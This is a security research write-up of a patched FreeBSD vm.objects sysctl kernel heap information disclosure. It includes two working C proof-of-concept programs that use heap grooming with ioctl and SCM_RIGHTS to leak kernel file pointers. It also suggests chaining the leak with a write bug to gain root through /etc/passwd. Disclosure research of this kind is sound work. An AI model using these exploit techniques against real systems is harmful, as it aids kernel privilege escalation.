FreeBSD 11.2+ vm.objects sysctl Kernel Heap Information Disclosure
chrisIntroduction
FreeBSD 11.2 introduced a kernel heap information disclosure bug due to
missing memory sanitisation through the vm.objects
sysctl. Actually, the
underlying bug was present since 10.3, but existed as a stack information
disclosure instead.
While kernel information disclosure bugs aren't terribly interesting by themselves, they can form an important part of an exploit chain: disclosing useful heap addresses is often essential to paving the way to upgrade a restricted memory corruption vulnerability to an arbitrary read/write capability.
This article describes the bug, discusses simple grooming options for leaking potentially useful pointers and provides a proof-of-concept exploit to demonstrate the issue.
The vulnerability was reported to the FreeBSD Security Officer Team on the 4th of December, 2022, and subsequently patched in January after the holiday season had passed. Thanks again to Philip Paeps from the FreeBSD Security Team for a very fast response.
Vulnerability Overview
For the uninitiated, "sysctl"s are something of a second-class syscall
interface. They're basically system-wide key/value pairs exposed by the
kernel for reading (and sometimes writing) through the sysctl(2)
syscall.
The sysctl(2)
syscall allows userland to provide 3 high-level pieces of
data:
- The key of the sysctl to query.
- An optional userland pointer and size to fetch the "old" value into.
- An optional userland pointer and size to provide a "new" value.
For a lot of sysctls, since they're system-wide, providing a "new" value
requires root privileges. To read some value, userland will typically just
provide a pointer/size for the "old" value and leave the "new" pointer/size as
NULL
/0
.
While most sysctls expose simple primitive datatypes, such as strings or
integers, some sysctls are more complex and interesting. To serve the more
interesting cases, the FreeBSD kernel source provides the SYSCTL_PROC
macro,
which basically says "declare this sysctl and use that function to handle the
request".
The functions that handle the requests sometimes get less attention than traditional syscalls, so they're worth exploring for vulnerabilities.
Here's the vm.objects
sysctl definition from the vm/vm_object.c
file in
the FreeBSD kernel:
static int
[2] sysctl_vm_object_list(SYSCTL_HANDLER_ARGS)
{
return (vm_object_list_handler(req, false));
}
[1] SYSCTL_PROC(_vm, OID_AUTO, objects, CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_SKIP |
CTLFLAG_MPSAFE, NULL, 0, sysctl_vm_object_list, "S,kinfo_vmobject",
"List of VM objects");
We can see the SYSCTL_PROC
macro defining the "objects"
node of the "vm"
root node [1] and referencing the function sysctl_vm_object_list
[2] as the
handler function.
Notice that the SYSCTL_HANDLER_ARGS
macro expands to the standard argument
list of a sysctl implementation:
#define SYSCTL_HANDLER_ARGS struct sysctl_oid *oidp, void *arg1, \
intmax_t arg2, struct sysctl_req *req
Let's see what actually happens in vm_object_list_handler
, then:
static int
vm_object_list_handler(struct sysctl_req *req, bool swap_only)
{
struct kinfo_vmobject *kvo;
char *fullpath, *freepath;
struct vnode *vp;
struct vattr va;
vm_object_t obj;
vm_page_t m;
u_long sp;
int count, error;
[3] if (req->oldptr == NULL) {
/*
* If an old buffer has not been provided, generate an
* estimate of the space needed for a subsequent call.
*/
...
return (SYSCTL_OUT(req, NULL, sizeof(struct kinfo_vmobject) *
count * 11 / 10));
}
[4] kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK);
error = 0;
/*
* VM objects are type stable and are never removed from the
* list once added. This allows us to safely read obj->object_list
* after reacquiring the VM object lock.
*/
mtx_lock(&vm_object_list_mtx);
[5] TAILQ_FOREACH(obj, &vm_object_list, object_list) {
...
if (obj->type == OBJT_DEAD ||
(swap_only && (obj->flags & (OBJ_ANON | OBJ_SWAP)) == 0))
continue;
VM_OBJECT_RLOCK(obj);
if (obj->type == OBJT_DEAD ||
(swap_only && (obj->flags & (OBJ_ANON | OBJ_SWAP)) == 0)) {
VM_OBJECT_RUNLOCK(obj);
continue;
}
mtx_unlock(&vm_object_list_mtx);
[6] kvo->kvo_size = ptoa(obj->size);
kvo->kvo_resident = obj->resident_page_count;
kvo->kvo_ref_count = obj->ref_count;
...
/* Pack record size down */
kvo->kvo_structsize = offsetof(struct kinfo_vmobject, kvo_path)
+ strlen(kvo->kvo_path) + 1;
kvo->kvo_structsize = roundup(kvo->kvo_structsize,
sizeof(uint64_t));
[7] error = SYSCTL_OUT(req, kvo, kvo->kvo_structsize);
maybe_yield();
mtx_lock(&vm_object_list_mtx);
if (error)
break;
}
mtx_unlock(&vm_object_list_mtx);
free(kvo, M_TEMP);
return (error);
}
The purpose of this sysctl is to provide a list of information about virtual memory objects to userland. This could be a pretty lengthy list depending on exactly how many objects are visible to the calling process.
If userland called the sysctl with a NULL
"old" pointer, the kernel tries to
provide some useful estimate of the size of buffer they should allocate and
call again with [3].
If an "old" pointer/size was provided, then the kernel tries to provide as
much of the information as possible. It begins by allocating an object that
it will populate for each object [4]. This is a struct kinfo_vmobject
struct.
Next, it loops through all of the objects on the global vm_object_list
[5]
and populates that information object with various pieces of information —
some of which are shown in the snippet starting at [6], but many are omitted
here for brevity.
Once the various fields are set, the kernel copies out the information about this current virtual memory object [7] and continues on to the next one.
The short story of what's happening, then, is that the kernel iterates over all of the registered virtual memory objects and copies out some information object for each to userland.
The object the kernel uses to store this information in is a kinfo_vmobject
and is particularly interesting because the call to malloc
doesn't pass the
M_ZERO
flag. That means that the memory will not be zero-initialised by the
kernel heap allocator.
If any fields aren't explicitly set by the logic here, those uninitialised bytes will be copied out to userland.
Sure enough, it seems there are plenty of bytes that remain uninitialised:
/*
* The "vm.objects" sysctl provides a list of all VM objects in the system
* via an array of these entries.
*/
struct kinfo_vmobject {
int kvo_structsize; /* Variable size of record. */
int kvo_type; /* Object type: KVME_TYPE_*. */
uint64_t kvo_size; /* Object size in pages. */
uint64_t kvo_vn_fileid; /* inode number if vnode. */
uint32_t kvo_vn_fsid_freebsd11; /* dev_t of vnode location. */
int kvo_ref_count; /* Reference count. */
int kvo_shadow_count; /* Shadow count. */
int kvo_memattr; /* Memory attribute. */
uint64_t kvo_resident; /* Number of resident pages. */
uint64_t kvo_active; /* Number of active pages. */
uint64_t kvo_inactive; /* Number of inactive pages. */
union {
uint64_t _kvo_vn_fsid;
uint64_t _kvo_backing_obj; /* Handle for the backing obj */
} kvo_type_spec; /* Type-specific union */
uint64_t kvo_me; /* Uniq handle for anon obj */
uint64_t _kvo_qspare[6];
uint32_t kvo_swapped; /* Number of swapped pages */
uint32_t _kvo_ispare[7];
char kvo_path[PATH_MAX]; /* Pathname, if any. */
};
At first glance, it looks like we've struck info-disclosure gold with the
very large kvo_path
field at the end (PATH_MAX
is 1024
), but if we refer
back to the copyout logic, we use the strlen
of that field as an
upper-bound.
Even so, there are a few "spare" fields that provide more than enough useful bytes to leak.
Exploitability Analysis
Uninitialised kernel heap disclosures aren't useful in every case. The case
here is pretty promising, however, because the allocation comes from the
general purpose heap (i.e. through malloc
) and there are clearly plenty of
bytes for us to target with a groom in the _kvo_qspare
and _kvo_ispare
fields.
So long as we can think of a way to get some useful kernel heap pointers leaked through those fields, this is a useful leak to have.
Before getting to the point of considering useful leaks, however, we should demonstrate the trivial case: leaking a bunch of bytes we can control as a starting point.
The ioctl(2)
syscall is a good candidate for this:
int
sys_ioctl(struct thread *td, struct ioctl_args *uap)
{
u_char smalldata[SYS_IOCTL_SMALL_SIZE] __aligned(SYS_IOCTL_SMALL_ALIGN);
uint32_t com;
int arg, error;
u_int size;
caddr_t data;
...
[1] size = IOCPARM_LEN(com);
...
if (size > 0) {
if (com & IOC_VOID) {
...
} else {
if (size > SYS_IOCTL_SMALL_SIZE)
[2] data = malloc((u_long)size, M_IOCTLOPS, M_WAITOK);
else
data = smalldata;
}
...
if (com & IOC_IN) {
[3] error = copyin(uap->data, data, (u_int)size);
...
error = kern_ioctl(td, uap->fd, com, data);
if (error == 0 && (com & IOC_OUT))
error = copyout(data, uap->data, (u_int)size);
out:
if (size > SYS_IOCTL_SMALL_SIZE)
[4] free(data, M_IOCTLOPS);
return (error);
}
The size of the data from userland is extracted from the ioctl command itself
using the IOCPARM_LEN
macro [1]. For small sizes, the kernel uses a buffer
on the stack — but over a certain limit, it allocates the size using malloc
[2]. This limit is 128 bytes.
With a buffer allocated, it then does a copyin
[3], calls down to
kern_ioctl
and then frees on the exit path [4].
Why is this useful? The FreeBSD kernel heap allocator works in a LIFO
fashion: malloc
will return back the last memory chunk free
d (for the same
size class). That means that if we try to invoke a spurious ioctl (or an
ioctl on a spurious file descriptor), this becomes a simple malloc
,
copyin
, free
gadget that we can use to control the uninitialised bytes of
the next malloc
.
If the next malloc
is the one from the vm.objects
sysctl then we should
see those bytes coming back to us.
Here's a simple PoC to test:
#include <err.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/sysctl.h>
#include <sys/user.h>
#include <unistd.h>
static void
hexdump(const void *data, size_t datasz)
{
const unsigned char *b = data;
size_t n;
for (n = 0; n < datasz; ++n) {
fprintf(stderr, "%02x ", b[n]);
switch ((n + 1) & 0xf) {
case 0: fputs("\n", stderr); break;
case 8: fputs(" ", stderr); break;
}
}
fputs("\n", stderr);
}
static void
prep_leak(void)
{
unsigned char dummy[sizeof(struct kinfo_vmobject)];
memset(dummy, 'A', sizeof(dummy));
ioctl(-1, _IOW(0, 0, dummy), dummy);
}
int
main(int argc, char *argv[])
{
unsigned char buf[sizeof(struct kinfo_vmobject)];
size_t bufsz = sizeof(buf);
bzero(buf, sizeof(buf));
prep_leak();
sysctlbyname("vm.objects", buf, &bufsz, NULL, 0);
hexdump(buf, bufsz);
return 0;
}
Trying it out, we can see our controlled data:
$ cc -o vm_objects vm_objects.c && ./vm_objects
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 05 00 00 00
You'll notice a lot of repeated data here. That's because we provided a
buffer big enough to fit a whole struct kinfo_vmobject
in, but due to the
strlen
of the path limiting the copyout
, each virtual memory object
actually only occupies a small amount of the buffer.
The repeating hacking number regions are the "spare" fields that we're seeing for each object.
Finding a Leak Target
When in possession of a kernel heap information disclosure bug like this, we
need to do a little research to groom the heap in a way that leaks some data
we actually care about. Sadly, nobody cares about leaking "AAAA..."
, so
we'll need to think some more.
The first thing we need to understand is which malloc
bucket this leak is
coming from. The kernel heap allocator coarsely organises its internal
allocation buckets by size. To determine which bucket this particular leak is
coming from, we need to know the size of the kinfo_vmobject
struct:
$ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (aarch64).
(lldb) p sizeof(struct kinfo_vmobject)
(unsigned long) $0 = 1184
And check that against the malloc
bucket sizes defined in
kern/kern_malloc.c
:
struct {
int kz_size;
const char *kz_name;
uma_zone_t kz_zone[MALLOC_DEBUG_MAXZONES];
} kmemzones[] = {
{16, "malloc-16", },
{32, "malloc-32", },
{64, "malloc-64", },
{128, "malloc-128", },
{256, "malloc-256", },
{384, "malloc-384", },
{512, "malloc-512", },
{1024, "malloc-1024", },
{2048, "malloc-2048", },
{4096, "malloc-4096", },
{8192, "malloc-8192", },
{16384, "malloc-16384", },
{32768, "malloc-32768", },
{65536, "malloc-65536", },
{0, NULL},
};
Since the size of the object is 1184 bytes, it's too big to come from the 1024 bucket — it must be from the 2048 bucket.
Whatever we're trying to leak, it has to come from the same bucket and has to contain something useful.
This is where a hunt for "elastic objects" is pretty handy. Rather than just
looking for single struct
s of the right size that happen to be allocated
using malloc
, we can look for calls to malloc
that have some dynamic
element to them.
One such useful elastic object is the allocation done when file descriptors
are sent over a UNIX domain socket with the SCM_RIGHTS
auxiliary control
message ("cmsg").
Leaking File Structs with SCM_RIGHTS
The uipc_send
kernel function handles the guts of sending data over a UNIX
domain socket:
static int
uipc_send(struct socket *so, int flags, struct mbuf *m, struct sockaddr *nam,
struct mbuf *control, struct thread *td)
{
...
if (control != NULL &&
[1] (error = unp_internalize(&control, td, NULL, NULL, NULL)))
goto release;
If an auxiliary control message was passed to the sendmsg(2)
syscall, the
kernel calls unp_internalize
[1].
Control messages are basically extra bits of information that can be sent with a message. The control messages themselves are just sent in an array, one after another, and each message in that list can have a different "type", length and associated data.
For UNIX domain sockets, there are a few different types of extra data that a
process can send in this way, but the one we're interested in here is
SCM_RIGHTS
, which allows a process to send file descriptors to the
recipient. It's an interesting and neat feature that we can see
unp_internalize
handle:
static int
unp_internalize(struct mbuf **controlp, struct thread *td,
struct mbuf **clast, u_int *space, u_int *mbcnt)
{
struct mbuf *control, **initial_controlp;
struct proc *p;
struct filedesc *fdesc;
struct bintime *bt;
struct cmsghdr *cm;
struct cmsgcred *cmcred;
struct filedescent *fde, **fdep, *fdev;
struct file *fp;
struct timeval *tv;
struct timespec *ts;
void *data;
socklen_t clen, datalen;
int i, j, error, *fdp, oldfds;
u_int newlen;
MPASS((*controlp)->m_next == NULL); /* COMPAT_OLDSOCK may violate */
UNP_LINK_UNLOCK_ASSERT();
p = td->td_proc;
fdesc = p->p_fd;
error = 0;
control = *controlp;
*controlp = NULL;
initial_controlp = controlp;
[2] for (clen = control->m_len, cm = mtod(control, struct cmsghdr *),
data = CMSG_DATA(cm);
clen >= sizeof(*cm) && cm->cmsg_level == SOL_SOCKET &&
clen >= cm->cmsg_len && cm->cmsg_len >= sizeof(*cm) &&
(char *)cm + cm->cmsg_len >= (char *)data;
clen -= min(CMSG_SPACE(datalen), clen),
cm = (struct cmsghdr *) ((char *)cm + CMSG_SPACE(datalen)),
data = CMSG_DATA(cm)) {
...
datalen = (char *)cm + cm->cmsg_len - (char *)data;
switch (cm->cmsg_type) {
...
case SCM_RIGHTS:
[3] oldfds = datalen / sizeof (int);
if (oldfds == 0)
continue;
/* On some machines sizeof pointer is bigger than
* sizeof int, so we need to check if data fits into
* single mbuf. We could allocate several mbufs, and
* unp_externalize() should even properly handle that.
* But it is not worth to complicate the code for an
* insane scenario of passing over 200 file descriptors
* at once.
*/
newlen = oldfds * sizeof(fdep[0]);
if (CMSG_SPACE(newlen) > MCLBYTES) {
error = EMSGSIZE;
goto out;
}
/*
* Check that all the FDs passed in refer to legal
* files. If not, reject the entire operation.
*/
fdp = data;
FILEDESC_SLOCK(fdesc);
[4] for (i = 0; i < oldfds; i++, fdp++) {
fp = fget_noref(fdesc, *fdp);
if (fp == NULL) {
FILEDESC_SUNLOCK(fdesc);
error = EBADF;
goto out;
}
if (!(fp->f_ops->fo_flags & DFLAG_PASSABLE)) {
FILEDESC_SUNLOCK(fdesc);
error = EOPNOTSUPP;
goto out;
}
}
/*
* Now replace the integer FDs with pointers to the
* file structure and capability rights.
*/
[5] *controlp = sbcreatecontrol(NULL, newlen,
SCM_RIGHTS, SOL_SOCKET, M_WAITOK);
fdp = data;
[6] for (i = 0; i < oldfds; i++, fdp++) {
if (!fhold(fdesc->fd_ofiles[*fdp].fde_file)) {
fdp = data;
for (j = 0; j < i; j++, fdp++) {
fdrop(fdesc->fd_ofiles[*fdp].
fde_file, td);
}
FILEDESC_SUNLOCK(fdesc);
error = EBADF;
goto out;
}
}
fdp = data;
fdep = (struct filedescent **)
CMSG_DATA(mtod(*controlp, struct cmsghdr *));
[7] fdev = malloc(sizeof(*fdev) * oldfds, M_FILECAPS,
M_WAITOK);
[8] for (i = 0; i < oldfds; i++, fdev++, fdp++) {
fde = &fdesc->fd_ofiles[*fdp];
fdep[i] = fdev;
[9] fdep[i]->fde_file = fde->fde_file;
filecaps_copy(&fde->fde_caps,
&fdep[i]->fde_caps, true);
unp_internalize_fp(fdep[i]->fde_file);
}
FILEDESC_SUNLOCK(fdesc);
break;
...
This code looks long and complex, but we needn't fear it. At the top level,
the code loops over the list of cmsgs [2] and switches on the type of each.
For a control message of type SCM_RIGHTS
, the kernel first determines how
many file descriptors follow the cmsg header [3].
Next, it loops over all of the file descriptors making sure that they're able
to be sent [4] (some types of file are forbidden from being sent like this)
before allocating an mbuf to hold an array of filedescent
pointers [5].
mbufs are a unit of heap allocation specific to the networking stack in
FreeBSD. They're backed by their own special zone and arbitrary lengths are
constructed by creating a linked list of mbufs. We can largely ignore them
for the discussion here.
A filedescent
is how an open file within a process' file descriptor table is
represented. In fact, a numeric file descriptor is literally just an index
into a table of these structures:
struct filedescent {
struct file *fde_file; /* file structure for open file */
struct filecaps fde_caps; /* per-descriptor rights */
uint8_t fde_flags; /* per-process open file flags */
seqc_t fde_seqc; /* keep file and caps in sync */
};
Each entry points to the file
struct that's open and has some other
associated fields (e.g. if UF_CLOEXEC
has been set for that descriptor).
Remember that at this point the kernel's only allocated an array of pointers to these.
With an array of filedescent
pointers allocated, the next step is to walk
over the list of file descriptors again and obtain a reference to each [6].
If this fails for any, the whole process is aborted.
Finally, the kernel has determined that the descriptors are sendable and it
was able to acquire a reference on each. The last step is to allocate an
array to hold the actual filedescent
structs [7], then loop over the
descriptors one last time [8], setting the filedescent
pointers in the mbuf
to an element in this new malloc
d array [9].
Here's a rough diagram of how this data will look:
When the UNIX message is received by the recipient process, this process is
reversed: the filedescent
s are pulled out of the control message and
inserted into the receiving process' file descriptor table. The array of
filedescent
s that were allocated in unp_internalize
is free
d once this
is done. See unp_externalize
if you're interested.
The elastic object we're interested in leaking is the array of filedescent
structs at [7]. By leaking the contents of that array, we can discover a
kernel pointer to a live file
struct. That's a useful pointer to have if we
have an arbitrary write, since we can do interesting things like granting
write access to a file we have open for reading (e.g. /etc/passwd
or
/etc/libmap.conf
— see man libmap.conf
to spark your imagination).
We can control the size of the malloc
through the number of
file descriptors we send in our cmsg. Hitting our target is simple:
$ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (aarch64).
(lldb) p sizeof(struct kinfo_vmobject) / sizeof(struct filedescent)
(unsigned long) $0 = 24
We just need to send 24 file descriptors.
Proof of Concept
Our final exploitation strategy is:
- Create a connected pair of UNIX domain sockets with
socketpair(2)
. - Fork and have the child process block on a
recv(2)
. - Open the file that we wish to disclose the
file
pointer of. - Send a message to the child process with an
SCM_RIGHTS
cmsg containing 24 copies of that file descriptor. - Once the descriptors have been received by the child, leak memory via the
vm.objects
sysctl.
Here's a simple PoC:
/*
* FreeBSD 11.2+ vm.objects sysctl Kernel Heap Information Disclosure PoC
* 2022-Dec-08
*
* [email protected]
*/
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/cpuset.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/sysctl.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>
static void
pin_to_cpu(size_t n)
{
cpuset_t cs;
CPU_ZERO(&cs);
CPU_SET(n, &cs);
if (-1 == cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_PID, -1,
sizeof(cs), &cs))
err(1, "cpuset_setaffinity");
}
static void
child_proc(int sock)
{
unsigned char ack = 0;
/* receive the file descriptors */
if (-1 == recv(sock, &ack, sizeof(ack), 0))
err(1, "recv");
/* acknowledge receipt so we know the buffer is free */
if (-1 == send(sock, &ack, sizeof(ack), 0))
err(1, "send");
}
#define NFDS (sizeof(struct kinfo_vmobject) / sizeof(struct filedescent))
static const void *
leak_kptr(int fd)
{
struct kinfo_vmobject buf;
size_t bufsz = sizeof(buf);
pid_t child;
int s[2];
unsigned char ack = 0;
struct iovec iov = {
.iov_base = &ack,
.iov_len = sizeof(ack)
};
unsigned char cmsgbuf[CMSG_SPACE(sizeof(int) * NFDS)];
struct cmsghdr *cmsgh;
struct msghdr msgh;
size_t n;
int *pfd;
if (-1 == socketpair(AF_UNIX, SOCK_STREAM, PF_UNSPEC, s))
err(1, "socketpair");
switch ((child = fork())) {
case -1: err(1, "fork");
case 0:
/* child will receive the fds */
close(s[0]);
pin_to_cpu(0);
child_proc(s[1]);
exit(0);
}
/* this proc will send the fds */
close(s[1]);
pin_to_cpu(0);
/* set up the cmsg first */
bzero(cmsgbuf, sizeof(cmsgbuf));
cmsgh = (struct cmsghdr *)cmsgbuf;
cmsgh->cmsg_level = SOL_SOCKET;
cmsgh->cmsg_type = SCM_RIGHTS;
cmsgh->cmsg_len = CMSG_LEN(sizeof(int) * NFDS);
for (pfd = (int *)CMSG_DATA(cmsgh), n = 0; n < NFDS; ++n) {
*pfd++ = fd;
}
/* now the msghdr */
bzero(&msgh, sizeof(msgh));
msgh.msg_iov = &iov;
msgh.msg_iovlen = 1;
msgh.msg_control = cmsgh;
msgh.msg_controllen = cmsgh->cmsg_len;
/* send and await ack */
if (-1 == sendmsg(s[0], &msgh, 0))
err(1, "sendmsg");
if (-1 == recv(s[0], &ack, 1, 0))
err(1, "recv");
/* now we can leak the buffer */
bzero(&buf, sizeof(buf));
sysctlbyname("vm.objects", &buf, &bufsz, NULL, 0);
/* and reap the child */
waitpid(child, NULL, 0);
return *(const void **)(&buf._kvo_qspare[3]);
}
int
main(int argc, char *argv[])
{
int fd[2];
/* open some interesting files to leak: */
if (-1 == (fd[0] = open("/etc/passwd", O_RDONLY)))
err(1, "open");
if (-1 == (fd[1] = open("/etc/libmap.conf", O_RDONLY)))
err(1, "open");
fprintf(stderr, "[+] /etc/passwd file ptr: %p\n", leak_kptr(fd[0]));
fprintf(stderr, "[+] /etc/libmap.conf file ptr: %p\n", leak_kptr(fd[1]));
/* close and re-open to show LIFO behaviour: */
fputs("[+] close + reopen\n", stderr);
close(fd[1]);
if (-1 == (fd[1] = open("/etc/libmap.conf", O_RDONLY)))
err(1, "open");
fprintf(stderr, "[+] /etc/libmap.conf file ptr (again): %p\n", leak_kptr(fd[1]));
return 0;
}
The output of running it:
$ cc -o vm_objects vm_objects.c && ./vm_objects
[+] /etc/passwd file ptr: 0xfffffd00009db6e0
[+] /etc/libmap.conf file ptr: 0xfffffd00009db410
[+] close + reopen
[+] /etc/libmap.conf file ptr (again): 0xfffffd00009db410
Success. Now we can chain that arbitrary write vulnerability to grant us
write-access to /etc/passwd
, add an empty-password root user and elevate.
What do you mean you don't have an arbitrary write vulnerability...?
Fix
The fix for this bug is super simple: the malloc
in vm_object_list_handler
just needs to include the M_ZERO
flag. This ensures that the memory is
zero-initialised and nothing useful will leak back to userland:
--- a/sys/vm/vm_object.c
+++ b/sys/vm/vm_object.c
@@ -2523,7 +2523,7 @@ vm_object_list_handler(struct sysctl_req *req, bool swap_only)
count * 11 / 10));
}
- kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK);
+ kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK | M_ZERO);
error = 0;
/*
Conclusion
FreeBSD tends to do a decent job of preventing information disclosure bugs these days, but it really depends on the developer remembering to do the right thing at the right time; it's quite error-prone.
We were lucky in this case that the leaky allocation came from the general-purpose heap allocator. For many other types of object, if they originate from a dedicated zone, it's generally not possible to control the leak in such an easy way that we did here.
Even so, these bugs can be fun to play with and don't require a huge amount of effort to make into useful parts of a chain. It's worth finding them.
For context on the effort put into this research, I took around an hour to walk through a bunch of sysctls before finding this and writing a PoC maybe took 30 minutes altogether.